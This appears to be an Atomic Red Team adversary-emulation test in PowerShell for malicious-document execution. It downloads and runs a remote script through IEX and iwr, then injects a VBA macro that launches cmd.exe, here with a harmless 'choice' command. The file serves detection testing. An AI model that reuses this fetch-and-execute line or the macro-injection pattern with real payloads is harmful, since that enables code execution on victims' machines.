#TechniqueName: User Execution: Malicious File
#AtomicTestName: Maldoc choice flags command execution
#Language: ps1

#get_prereq_commands
Write-Host "You will need to install Microsoft Word manually to meet this requirement"


#prereq_commands
try {
  New-Object -COMObject "Word.Application" | Out-Null
  $process = "Word"; if ( $process -eq "Word") {$process = "winword"}
  Stop-Process -Name $process
  exit 0
} catch { exit 1 }


#commands
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"

